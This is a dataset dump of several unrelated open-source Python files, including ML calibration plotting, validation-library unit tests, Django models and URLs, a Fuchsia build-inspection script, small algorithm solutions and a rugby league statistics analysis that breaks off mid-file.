draw_plot_CAM(mAP_bins, count_bins, network, note):\n # count_bins = [count / 1449 * 100 for count in count_bins]\n num_bin = len(mAP_bins)\n # bins = [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n bins = np.linspace(start=0, stop=1-1/num_bin, num=num_bin).tolist()\n bins_hundred = np.linspace(start=0, stop=(\n 1 - 1 / num_bin) * 100, num=num_bin).tolist()\n\n # plt.bar(bins, mAP_bins, width=1/num_bin-1/(num_bin*10), edgecolor='#4D79C8')\n # plt.bar(bins, bins_hundred, width=1 / num_bin, color='#FA7F6F', edgecolor='black', label='GAP')\n plt.bar(bins, mAP_bins, width=1 / num_bin,\n color='#82B0D2', edgecolor='black', label='mIoU')\n\n plt.title(f'{note} per bin {network}')\n plt.xlabel('CAM')\n plt.ylabel(f'{note} of the Multi-label Classification')\n plt.legend()\n plt.savefig(f'Fig/fig_ECE/{args.session_name}/{network}_{note}.png')\n # plt.show()\n plt.clf()\n\n # plt.bar(bins, count_bins, width=1/num_bin-1/(num_bin*10), edgecolor='#4D79C8')\n plt.bar(bins, count_bins, width=1 / num_bin,\n color='#FA7F6F', edgecolor='black', label='Count')\n plt.title(f'count per bin {network}')\n plt.savefig(f'Fig/fig_ECE/{args.session_name}/{network}_confidence_count.png')\n # plt.show()\n\n\ndef draw_plot_confidence(mAP_bins, count_bins, network, note):\n # count_bins = [count / 1449 * 100 for count in count_bins]\n num_bin = len(mAP_bins)\n # bins = [0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\n bins = np.linspace(start=0, stop=1-1/num_bin, num=num_bin).tolist()\n bins_hundred = np.linspace(start=0, stop=(\n 1 - 1 / num_bin) * 100, num=num_bin).tolist()\n\n # plt.bar(bins, mAP_bins, width=1/num_bin-1/(num_bin*10), edgecolor='#4D79C8')\n # plt.bar(bins, bins_hundred, width=1 / num_bin, color='#FA7F6F', edgecolor='black', label='GAP')\n plt.bar(bins, mAP_bins, width=1 / num_bin,\n color='#82B0D2', edgecolor='black', label='mIoU')\n\n plt.title(f'{note} per bin {network}')\n plt.xlabel('confidence')\n plt.ylabel(f'{note} of the Multi-label Classification')\n plt.legend()\n plt.savefig(f'Fig/fig_ECE/{args.session_name}/{network}_{note}.png')\n # plt.show()\n plt.clf()\n\n # plt.bar(bins, count_bins, width=1/num_bin-1/(num_bin*10), edgecolor='#4D79C8')\n plt.bar(bins, count_bins, width=1 / num_bin,\n color='#FA7F6F', edgecolor='black', label='Count')\n plt.title(f'count per bin {network}')\n \n plt.savefig(f'Fig/fig_ECE/{args.session_name}/{network}_confidence_count.png')\n # plt.show()\n\n\ndef cam2mask(cam):\n h, w = list(cam.values())[0].shape\n tensor = np.zeros((21, h, w), np.float32)\n for key in cam.keys():\n tensor[key + 1] = cam[key]\n tensor[0, :, :] = 0.1\n mask = np.argmax(tensor, axis=0).astype(np.uint8)\n return mask\n\n\ndef compute_mIoU(prediction, gt):\n pass\n\n\ndef putpalette(mask):\n colormap = [[0, 0, 0], [128, 0, 0], [0, 128, 0], [128, 128, 0], [0, 0, 128],\n [128, 0, 128], [0, 128, 128], [128, 128, 128], [64, 0, 0],\n [192, 0, 0], [64, 128, 0], [192, 128, 0], [64, 0, 128],\n [192, 0, 128], [64, 128, 128], [192, 128, 128], [0, 64, 0],\n [128, 64, 0], [0, 192, 0], [128, 192, 0], [0, 64, 128]]\n\n r = mask.copy()\n g = mask.copy()\n b = mask.copy()\n\n for cls in range(21):\n r[mask == cls] = colormap[cls][0]\n g[mask == cls] = colormap[cls][1]\n b[mask == cls] = colormap[cls][2]\n\n # b[mask == cls] = self.colormap[color_cls][2]\n\n rgb = np.zeros((mask.shape[0], mask.shape[1], 3))\n rgb[:, :, 0] = b\n rgb[:, :, 1] = g\n rgb[:, :, 2] = r\n\n return rgb.astype('uint8')\n\n\ndef concat_two_img(img1, img2):\n image = np.hstack((img1, img2))\n return image\n\n\ndef case_show(args, name, img, label, prediction, mIoU, bin, dir_save):\n dir_img = os.path.join(args.voc12_root, args.img_dir, name+'.jpg')\n dir_cam = os.path.join(args.out_cam, name+'.npy')\n args.gt_dir = gt_dir = \"voc12/VOC2012/SegmentationClassAug\"\n dir_gt = os.path.join(args.gt_dir, name+'.png')\n\n img = mmcv.imread(dir_img)\n cam = np.load(dir_cam, allow_pickle=True).item()\n gt = mmcv.imread(dir_gt, flag='grayscale')\n\n cam_mask = cam2mask(cam)\n # mIou = compute_mIoU(cam_mask, gt)\n cam_mask = putpalette(cam_mask)\n gt = putpalette(gt)\n\n vis_cam = cv2.addWeighted(img, 0.4, cam_mask, 0.6, gamma=0.1)\n vis_gt = cv2.addWeighted(img, 0.4, gt, 0.6, gamma=0.1)\n vis = concat_two_img(vis_cam, vis_gt)\n\n vis = mmcv.imresize(vis.copy(), (2048, 1024))\n\n # prediction, label, mIoU\n label = np.argwhere(label.cpu())[0].tolist()\n prediction_classes = np.argwhere(prediction.cpu() > 0.5)[0].tolist()\n label = [categories[item] for item in label]\n\n prediction_classes = [categories[item] for item in prediction_classes]\n prediction_confidence = prediction[prediction > 0.5].mean().item()\n\n if np.isnan(prediction_confidence):\n prediction_confidence = prediction.max().item()\n # sample_accuracy = (prediction > 0.5).sum() + label\n # sample_loss = 0\n\n text_mIoU = f\"JS score = {round(mIoU * 100, 2)}%\"\n text_Confidence = f\"ML-Confidence = {round(prediction_confidence * 100, 2)}%\"\n text_label = f\"label = {label}\"\n text_prediction = f\"prediction = {prediction_classes}\"\n\n cv2.rectangle(vis, (1200, 0), (2048, 0 + 200), (255, 255, 255), -1)\n\n cv2.putText(vis, text_mIoU, (1225, 25),\n cv2.FONT_HERSHEY_COMPLEX, 1.0, (0, 0, 0), 2)\n cv2.putText(vis, text_Confidence, (1225, 75),\n cv2.FONT_HERSHEY_COMPLEX, 1.0, (0, 0, 0), 2)\n cv2.putText(vis, text_label, (1225, 125),\n cv2.FONT_HERSHEY_COMPLEX, 1.0, (0, 0, 0), 2)\n cv2.putText(vis, text_prediction, (1225, 175),\n cv2.FONT_HERSHEY_COMPLEX, 1.0, (0, 0, 0), 2)\n\n if not os.path.exists(dir_save):\n os.makedirs(dir_save)\n mmcv.imwrite(vis, os.path.join(dir_save, f'{bin}.png'))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Train a models')\n parser.add_argument('config', help='train config file path')\n parser.add_argument('--csv', type=str)\n parser.add_argument('--work-dir', help='the dir to save logs and models')\n parser.add_argument(\n '--resume-from', help='the checkpoint file to resume from')\n parser.add_argument('--tag', help='the tag')\n parser.add_argument(\n '--no-validate',\n action='store_true',\n help='whether not to evaluate the checkpoint during training')\n group_gpus = parser.add_mutually_exclusive_group()\n group_gpus.add_argument('--device', help='device used for training')\n group_gpus.add_argument(\n '--gpus',\n type=int,\n help='number of gpus to use '\n '(only applicable to non-distributed training)')\n group_gpus.add_argument(\n '--gpu-ids',\n type=int,\n nargs='+',\n help='ids of gpus to use '\n '(only applicable to non-distributed training)')\n parser.add_argument('--seed', type=int, default=None, help='random seed')\n parser.add_argument(\n '--deterministic',\n action='store_true',\n help='whether to set deterministic options for CUDNN backend.')\n parser.add_argument(\n '--options', nargs='+', action=DictAction, help='arguments in dict')\n args = parser.parse_args()\n\n return args\n\n\ndef writedict(file, dictionary):\n s = ''\n for key in dictionary.keys():\n sub = '%s:%s ' % (key, dictionary[key])\n s += sub\n s += '\\n'\n file.write(s)\n\n\ndef writelog(filepath, metric, comment):\n filepath = filepath\n logfile = open(filepath, 'a')\n import time\n logfile.write(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n logfile.write('\\t%s\\n' % comment)\n writedict(logfile, metric)\n logfile.write('=====================================\\n')\n logfile.close()\n\n\nif __name__ == '__main__':\n args = parse_args()\n cfg = Config.fromfile(args.config)\n if args.options is not None:\n cfg.merge_from_dict(args.options)\n args = cfg\n\n args.model_dir = os.path.join('work_dirs', args.session_name, \"model\")\n args.weights = os.path.join(args.model_dir, args.weights)\n args.test_dir = os.path.join('work_dirs', args.session_name, \"test\")\n args.out_cam = os.path.join(args.test_dir,\n f'cam_{args.eval_list.split(\"/\")[-1].split(\".\")[0]}_{args.weights.split(\"/\")[-1].split(\".\")[0]}')\n \n if os.path.exists(f'Fig/fig_ECE/{args.session_name}') == False:\n os.makedirs(f'Fig/fig_ECE/{args.session_name}')\n \n dir_score = f'miou_loss_csv/miou_loss_{args.session_name}_{args.weights.split(\"/\")[-1].split(\".\")[0]}_{args.eval_list.split(\"/\")[-1].split(\".\")[0]}.csv'\n\n Accuracy_bins, Accuracy_count_bins, _, Accuracy_overall, ML_ECE = compute_Conf_ECE(\n args, dir_score, num_bin=20, metric_func=Accuracy, note='Accuracy')\n draw_plot_confidence(Accuracy_bins, Accuracy_count_bins, args.fignote, note='Accuracy')\n print(f'{args.session_name} Accuracy_overall is {Accuracy_overall}')\n print(f'{args.session_name} ML_ECE is {ML_ECE}')","repo_name":"Muyun99/VICE","sub_path":"compute_ECE.py","file_name":"compute_ECE.py","file_ext":"py","file_size_in_byte":24187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14110987963","text":"import unittest\nimport src.pyvalidations as PyValidation\n\n\nclass TestRequiredDe(unittest.TestCase):\n\n def test_pyvalidation_is_required(self):\n data = {\n \"name_1\": \"Majid\",\n \"name_2\": \"\",\n \"name_3\": None,\n }\n rules = {\n \"name_1\": [\"required\"],\n \"name_2\": [\"required\"],\n \"name_3\": [\"required\"],\n }\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {'name_2': ['Das Feld name_2 ist erforderlich.'],\n 'name_3': ['Das Feld name_3 ist erforderlich.']},\n 'failed': True})\n\n def test_required_if_passed(self):\n data = {\n \"first_name\": \"\",\n \"last_name\": \"Ahmaditabar123\",\n \"age\": \"33\",\n }\n rules = {\n \"first_name\": [\"nullable\", \"alpha\"],\n \"last_name\": [\"required_if:first_name\", \"alpha\"],\n \"age\": [\"required_if:first_name\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {}, 'failed': False})\n\n def test_required_if_failed(self):\n data = {\n \"first_name\": \"Majid\",\n \"last_name\": \"Ahmaditabar123\",\n \"age\": \"\",\n }\n rules = {\n \"first_name\": [\"nullable\", \"alpha\"],\n \"last_name\": [\"required_if:first_name\", \"alpha\"],\n \"age\": [\"required_if:first_name\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {\n 'errors':\n {'age':\n ['Das Feld age ist erforderlich, wenn first_name vorhanden ist.',\n 'Das age muss eine Zahl sein.'],\n 'last_name': ['Das last_name darf nur Buchstaben enthalten.']},\n 'failed': True})\n\n def test_required_unless_passed(self):\n data = {\n \"email\": \"example@email.com\",\n \"phone\": \"s123456\",\n }\n rules = {\n \"email\": [\"nullable\", \"email\"],\n \"phone\": [\"required_unless:email\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {}, 'failed': False})\n\n def test_required_unless_failed(self):\n data = {\n \"email\": \"\",\n \"phone\": \"s123456\",\n \"name\": \"\",\n }\n rules = {\n \"email\": [\"nullable\", \"email\"],\n \"phone\": [\"required_unless:email\", \"numeric\"],\n \"name\": [\"required_unless:email\", \"alpyha\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {'name': ['Das Feld name ist erforderlich, es sei denn, email ist '\n 'nicht vorhanden oder leer.'],\n 'phone': ['Das phone muss eine Zahl sein.']},\n 'failed': True})\n\n def test_required_with_passed(self):\n data = {\n \"first_name\": \"\",\n \"last_name\": \"Ahmaditabar123\",\n \"age\": \"33\",\n }\n rules = {\n \"first_name\": [\"nullable\", \"alpha\"],\n \"last_name\": [\"required_if:first_name\", \"alpha\"],\n \"age\": [\"required_with:first_name,last_name\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {}, 'failed': False})\n\n def test_required_with_failed(self):\n data = {\n \"first_name\": \"Majid\",\n \"last_name\": \"Ahmaditabar\",\n \"age\": \"\",\n }\n rules = {\n \"first_name\": [\"nullable\", \"alpha\"],\n \"last_name\": [\"nullable\", \"alpha\"],\n \"age\": [\"required_with:first_name,last_name\", \"numeric\"],\n }\n\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {\n 'errors': {'age': ['Das Feld age ist erforderlich, wenn first_name,last_name vorhanden ist/sind.',\n 'Das age muss eine Zahl sein.']},\n 'failed': True})\n\n def test_required_without_passed(self):\n data = {\n \"email\": \"\",\n \"phone\": \"\",\n \"user_name\": \"MajAhd\",\n }\n rules = {\n \"email\": [\"nullable\", \"email\"],\n \"phone\": [\"nullable\", \"numeric\"],\n \"user_name\": [\"required_without:email,phone\", \"string\"],\n }\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {}, 'failed': False})\n\n def test_required_without_failed(self):\n data = {\n \"email\": \"\",\n \"phone\": \"\",\n \"user_name\": \"\",\n }\n rules = {\n \"email\": [\"nullable\", \"email\"],\n \"phone\": [\"nullable\", \"numeric\"],\n \"user_name\": [\"required_without:email,phone\", \"string\"],\n }\n validate = PyValidation.make(data, rules, \"de\")\n self.assertEqual(validate, {'errors': {'user_name': ['Das Feld user_name ist erforderlich, wenn '\n 'email,phone nicht vorhanden ist/sind.']},\n 'failed': True})\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"MajAhd/py_validations","sub_path":"tests/test_required_de.py","file_name":"test_required_de.py","file_ext":"py","file_size_in_byte":5421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25682450612","text":"import json\nfrom typing import Optional, Union\n\nfrom dataclasses import dataclass, field\n\n@dataclass\nclass PubSubMessage:\n \"\"\"\n Just a container for handling a message as it comes fresh off of\n Redis pubsub\n \"\"\"\n type: str\n pattern: Optional[str]\n channel: bytes\n data: Union[bytes, int]\n payload: Optional[dict] = field(init=False)\n\n def __post_init__(self):\n if self.is_message:\n self.payload = json.loads(self.data)\n else:\n self.payload = self.data\n\n @property\n def is_message(self):\n \"\"\"\n This refers to Redis PubSub message type, not the Chat message\n event type\n \"\"\"\n return self.type == \"message\" or self.type == \"pmessage\"\n","repo_name":"hciudad/yaca","sub_path":"chat/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33279355072","text":"# pages/urls.py\nfrom django.urls import path\nfrom .views import homePageView,MarkersMapView,MapView,CesiumView,MapPluemView\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\napp_name = \"markers\"\n\nurlpatterns = [\n path(\"\", homePageView, name=\"home\"),\n path(\"map/\", MapView, name=\"test\"),\n path(\"cesium/\", CesiumView, name=\"cesium\"),\n path(\"mapPluem/\", MapPluemView, name=\"mapall\"),\n]\n\nurlpatterns += staticfiles_urlpatterns() ","repo_name":"Apizz789/GISTDA_INTERNSHIP","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35669212865","text":"import argparse\nimport os\nimport subprocess\nimport sys\n\n\nSCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))\nFUCHSIA_ROOT = os.path.dirname( # $root\n os.path.dirname( # scripts\n SCRIPT_DIR)) # unification\n\n\nclass Finder(object):\n\n def __init__(self, gn_binary, zircon_dir, build_dir):\n self._zircon_dir = zircon_dir\n self._command = [gn_binary, '--root=' + zircon_dir, 'refs', build_dir,\n '--all-toolchains']\n\n def find_references(self, type, name):\n category_label = '//system/' + type\n base_label = '//system/' + type + '/' + name\n\n command = self._command + [base_label + ':*']\n try:\n output = subprocess.check_output(command)\n except subprocess.CalledProcessError:\n return None\n\n references = set()\n for line in output.splitlines():\n line = line.strip()\n if line.startswith(base_label):\n continue\n # Remove target name and toolchain.\n line = line[0:line.find(':')]\n if line == category_label:\n continue\n # Insert 'zircon' directory at the start.\n line = '//zircon' + line[1:]\n references.add(line)\n\n return references\n\n\n def find_libraries(self, type):\n base = os.path.join(self._zircon_dir, 'system', type)\n def has_build_file(dir):\n return os.path.isfile(os.path.join(base, dir, 'BUILD.gn'))\n for _, dirs, _ in os.walk(base):\n return filter(has_build_file, dirs)\n\n\ndef main():\n parser = argparse.ArgumentParser('Determines whether libraries can be '\n 'moved out of the ZN build')\n parser.add_argument('--build-dir',\n help='Path to the GN build dir',\n required=True)\n type = parser.add_mutually_exclusive_group(required=True)\n type.add_argument('--banjo',\n help='Inspect Banjo libraries',\n action='store_true')\n type.add_argument('--fidl',\n help='Inspect FIDL libraries',\n action='store_true')\n type.add_argument('--ulib',\n help='Inspect C/C++ libraries',\n action='store_true')\n parser.add_argument('name',\n help='Name of the library to inspect; if empty, scan '\n 'all libraries of the given type',\n nargs='?')\n args = parser.parse_args()\n\n source_dir = FUCHSIA_ROOT\n zircon_dir = os.path.join(source_dir, 'zircon')\n build_dir = os.path.abspath(args.build_dir)\n\n if sys.platform.startswith('linux'):\n platform = 'linux-x64'\n elif sys.platform.startswith('darwin'):\n platform = 'mac-x64'\n else:\n print('Unsupported platform: %s' % sys.platform)\n return 1\n gn_binary = os.path.join(source_dir, 'prebuilt', 'third_party', 'gn',\n platform, 'gn')\n\n finder = Finder(gn_binary, zircon_dir, build_dir)\n\n if args.fidl:\n type = 'fidl'\n elif args.banjo:\n type = 'banjo'\n elif args.ulib:\n type = 'ulib'\n\n # Case 1: a library name is given.\n if args.name:\n name = args.name\n if args.fidl:\n # FIDL library names use the dot separator, but folders use an\n # hyphen: be nice to users and support both forms.\n name = name.replace('.', '-')\n\n references = finder.find_references(type, name)\n\n if references is None:\n print('Could not find \"%s\", please check spelling!' % args.name)\n return 1\n elif references:\n print('Nope, there are still references in the ZN build:')\n for ref in sorted(references):\n print(' ' + ref)\n else:\n print('Yes you can!')\n\n return 0\n\n # Case 2: no library name given.\n print('Warning: this operation can take a while!')\n names = finder.find_libraries(type)\n movable = set()\n for name in names:\n references = finder.find_references(type, name)\n if not references:\n movable.add(name)\n if movable:\n print('These libraries are free to go:')\n for name in sorted(movable):\n print(' ' + name)\n else:\n print('No library may be moved')\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"winksaville/fuchsia","sub_path":"scripts/unification/can_i_move_out.py","file_name":"can_i_move_out.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"9924855770","text":"from sys import stdin, stdout\n\ninput = stdin.readline\nprint = stdout.write\n\nminval = 1000000000\nmaxval = -1000000000\n\n\ndef dfs(Op, res, cnt):\n global A, minval, maxval\n cnt += 1\n\n if sum(Op) == 0:\n minval = min(minval, res)\n maxval = max(maxval, res)\n\n if Op[0] > 0:\n Op1 = Op.copy()\n Op1[0] -= 1\n dfs(Op1, res + A[cnt], cnt)\n if Op[1] > 0:\n Op2 = Op.copy()\n Op2[1] -= 1\n dfs(Op2, res - A[cnt], cnt)\n if Op[2] > 0:\n Op3 = Op.copy()\n Op3[2] -= 1\n dfs(Op3, res * A[cnt], cnt)\n if Op[3] > 0:\n Op4 = Op.copy()\n Op4[3] -= 1\n if res < 0 and A[cnt] > 0:\n dfs(Op4, -int(abs(res) / A[cnt]), cnt)\n else:\n dfs(Op4, res // A[cnt], cnt)\n\n\nN = input()\nA = list(map(int, input().split()))\nOp = list(map(int, input().split()))\n\ndfs(Op, A[0], 0)\n\nprint(str(maxval) + '\\n')\nprint(str(minval))\n","repo_name":"Anjunheon/coding-test","sub_path":"BOJ/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35629645735","text":"# This sample tests that literal values are retained by the constraint\n# solver if they are found as type arguments.\n\nfrom typing import Literal\n\n\n_L1 = Literal[\"foo\", \"bar\"]\n\n\ndef combine(set1: set[_L1], set2: set[_L1]) -> None:\n x = set1 | set2\n reveal_type(x, expected_text=\"set[Literal['foo', 'bar']]\")\n","repo_name":"microsoft/pyright","sub_path":"packages/pyright-internal/src/tests/samples/typeVar11.py","file_name":"typeVar11.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":11208,"dataset":"github-code","pt":"48"} +{"seq_id":"8879287597","text":"import sys\n\nlines = iter(sys.stdin.readlines())\npsum = 0\nel = lambda l: set(item for item in l.strip())\n\nwhile True:\n try:\n e1 = el(next(lines))\n e2 = el(next(lines))\n e3 = el(next(lines))\n except StopIteration:\n break\n d = e1.intersection(e2).intersection(e3).pop()\n psum += ord(d) - 96 if d.islower() else ord(d) - 64 + 26\nprint(psum)\n","repo_name":"rschmied/aoc-2022","sub_path":"day3/part2-b.py","file_name":"part2-b.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14743821161","text":"from db_fixture import test_data\nimport time\nfrom HTMLTestRunner import HTMLTestRunner\nfrom unittest import defaultTestLoader\n\n# 指定测试用例为当前文件夹下的interface目录\ntest_dir = './interface'\ntestsuit = defaultTestLoader.discover(test_dir,pattern='*_test_case.py')\nif __name__=='__main__':\n # 初始化接口数据\n test_data.init_data()\n now = time.strftime(\"%Y-%m-%d %H_%M_%S\")\n report_name='./report/'+now+'result.html'\n fp = open(report_name,'wb')\n runner = HTMLTestRunner(stream=fp,\n title='发布会签到系统接口自动化测试',\n description='运行环境:MySQL(PyMySql),Requests,unittest')\n runner.run(testsuit)\n fp.close()\n","repo_name":"lyedzp/jiekouzidonghua","sub_path":"pyrequest/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22792363024","text":"from django.db import models\r\nfrom django.contrib.auth.models import User\r\nfrom GameArena.models import Game\r\nimport datetime\r\n\r\n# Purchase information\r\n\r\n\r\n\"\"\"\r\n@Class_Name:\r\n@Params: Payment Ref - Payment reference field\r\n Order_Date - Date the order was made\r\n Status - Status of the order\r\n Checksum - Check sum value\r\n\r\n\"\"\"\r\n\r\n\r\nclass Order(models.Model):\r\n paymentRef = models.IntegerField(null=True, blank=True)\r\n order_date = models.DateTimeField(default=datetime.datetime.now, blank=True)\r\n status = models.CharField(max_length=10, null=False, default=\"pending\")\r\n checksum = models.CharField(max_length=100, null=True, blank=True)\r\n\r\n class Meta:\r\n db_table = \"Order\"\r\n ordering = ['order_date']\r\n\r\n\r\n\"\"\"\r\n@Class_Name: Purchase\r\n@Params: game_details - Details pertaining to the game (Foreign Key)\r\n Player_Details - details of the player (Foreign Key)\r\n Cost - Cost associated with the game(s) of purchase\r\n Purchase_Date - date of purchase (Foreign Key)\r\n order - Order ID\r\n\r\n\"\"\"\r\n\r\n\r\nclass Purchase(models.Model):\r\n game_details = models.ForeignKey(Game, related_name='purchased_games', on_delete=models.CASCADE)\r\n player_details = models.ForeignKey(User, related_name='purchased_players', on_delete=models.CASCADE)\r\n cost = models.DecimalField(default=0.0, decimal_places=2, max_digits=10)\r\n purchase_date = models.DateTimeField(default=datetime.datetime.now, blank=True)\r\n order = models.ForeignKey(Order, related_name='order_items', null=True, blank=True)\r\n\r\n class Meta:\r\n db_table = \"Purchase\"\r\n ordering = ['purchase_date']\r\n\r\n def shortdesc(self):\r\n if (len(self.game_details.description) > 100):\r\n return self.game_details.description[0:100] + \"...\"\r\n else:\r\n return self.game_details.description\r\n\r\n def as_json_dict(self):\r\n res = {\r\n 'game': self.game_details.id,\r\n 'buyer': self.player_details.username,\r\n 'cost': self.cost,\r\n 'purchase_date': str(self.purchase_date),\r\n 'orderid': self.order.id\r\n }\r\n return res\r\n\r\n def __str__(self):\r\n return self.game_details.name\r\n\r\n\r\n\"\"\"\r\n@Class_Name: Cart\r\n@Params: game_details - Details of the game purhcased - Foreign Key\r\n Player_details - Player details ( Foreign Key)\r\n cart_Date - date of the cart - cart creation date\r\n order - order id (Foreign key)\r\n\"\"\"\r\n\r\n\r\nclass Cart(models.Model):\r\n game_details = models.ForeignKey(Game, related_name='carted_games', on_delete=models.CASCADE)\r\n player_details = models.ForeignKey(User, related_name='carted_players', on_delete=models.CASCADE)\r\n cart_date = models.DateTimeField(default=datetime.datetime.now, blank=True)\r\n order = models.ForeignKey(Order, related_name='order_cartitems', null=True, blank=True)\r\n\r\n class Meta:\r\n db_table = \"Cart\"\r\n ordering = ['cart_date']\r\n\r\n def __str__(self):\r\n return self.game_details.name\r\n","repo_name":"sklrsn/gamestore","sub_path":"gamestore/Store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35901120387","text":"# -*- coding: utf-8 -*-\n\"\"\"\nGenerting plots\n\"\"\"\n\n\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport json\nimport matplotlib.patches as pat\nimport matplotlib.pyplot as plt\nfrom scipy.stats import poisson\nfrom scipy.stats import skellam\n \nplt.clf()\n\ngames= pd.read_csv('pipeline\\\\games')\nwith open('pipeline\\\\match_timelines.json') as data_file:\n data = json.load(data_file)\nmatch_timelines = pd.DataFrame.from_dict(data)\n\nyear=2019\nmatch = 'Sharks vs Raiders'\ngame=games[(games['Year']==year)&(games['Match']==match)]\n\n\n\n#Associating a colour with each team\nteam_cols = {'Storm':'#011641',\n 'Rabbitohs':'#003C1A',\n 'Roosters':'#000080',\n 'Raiders':'#32CD32',\n 'Sea Eagles':'#6F0F3B',\n 'Eels':'#006EB5',\n 'Panthers':'#221F20',\n 'Broncos':'#FABF16',\n 'Knights':'#EE3524',\n 'Wests Tigers':'#F68C1A',\n 'Sharks':'#00A9D8',\n 'Warriors':'#BDBCBC',\n 'Cowboys':'#FFDD02',\n 'Dragons':'#E2231B',\n 'Bulldogs':'#00539F',\n 'Titans':'#FBB03F'}\n\n\nfield_made= pd.read_csv('pipeline\\\\field_made')\nfield_made_level =field_made[(field_made['Margin at Goal']==0)&(field_made['Time']>40)]\nfml_wins = field_made_level.loc[field_made_level['Result']=='Won','Time']\nfml_ties = field_made_level.loc[field_made_level['Result']=='Tied','Time']\nfml_losses = field_made_level.loc[field_made_level['Result']=='Lost','Time'] \n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist([fml_wins,fml_ties,fml_losses],stacked=True,bins=np.arange(65.5,81.5))\nplt.legend(['Won','Tied','Lost'])\nplt.xlabel('Time (mins)')\nplt.ylim(0,11)\nplt.title('Results of field goals kicked when scores level')\n\nfig.savefig('images\\\\field_goal_level.png')\n\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist(games['Tries+'],bins=np.arange(-0.5,13.5),normed=True)\nplt.plot(np.arange(0,13),poisson.pmf(np.arange(0,13),np.mean(games['Tries+'])))\nplt.legend(['Expected if Poisson','Observed'])\nplt.xlabel('Number of tries')\nplt.title('Tries: obxerved vs expected')\nfig.savefig('images\\\\poisson_try.png')\n\n\nf = np.unique(field_made['Margin at Goal'],return_counts=True)\n\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.bar(f[0],f[1],color='green')\nplt.xlim(-0.7,21)\nplt.xlabel('Margin at Goal')\nplt.ylabel('No. of Field Goals')\nplt.xticks(np.arange(0,24,6))\n\nfig.savefig('images\\\\field_goal_margins.png')\n\nfrom sklearn import linear_model\nfrom sklearn import metrics\nx = np.array(field_made_level['Time']).reshape(-1,1)\ny = np.array(field_made_level['Result']=='Won')\nlr = linear_model.LogisticRegression(solver='newton-cg').fit(x, y)\n \nlr.intercept_\nlr.coef_\n\n\n#example of scoreline\ns=get_scoreline('Sharks vs Raiders',2019)\ndef plot_score(scoreline):\n fig, ax = plt.subplots()\n home=ax.plot(scoreline['Time'],scoreline.iloc[:,1],color=team_cols[scoreline.columns[1]])\n away=ax.plot(scoreline['Time'],scoreline.iloc[:,2],color=team_cols[scoreline.columns[2]])\n plt.title(match+' ' +str(year))\n plt.xlabel('Match Time (mins)')\n plt.ylabel('Score')\n plt.legend([scoreline.columns[1],scoreline.columns[2]])\n plt.show()\n return fig\nfig = plot_score(s)\nfig.savefig('images\\\\Sharks_Raiders_scoreline.png')\nplt.clf()\n\ndef all_times(event):\n a=match_timelines[event].apply(pd.Series).stack().reset_index(drop=True)\n a=a[a<=80]\n return a\n\n#See the distribution of scoring events\nfg=all_times('Drop Goal-Made')\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist(fg,bins=np.arange(0.01,82.01,2))\nplt.xlabel('Game Time (mins)')\nplt.title('Distributions of Drop Goals Over 80 Minutes')\nplt.show()\nfig.savefig('images\\\\field_goal_hist.png')\n\nplt.clf()\n\npg=all_times('Penalty Shot-Made')\nfig=plt.figure() #set up the figures\nfig.set_size_inches(6, 5)\nax=fig.add_subplot(1,1,1)\nplt.hist(pg,bins=np.arange(0.01,82.01,2),color='red')\nplt.xlabel('Game Time (mins)')\nplt.title('Distributions of Penalty Goals Over 80 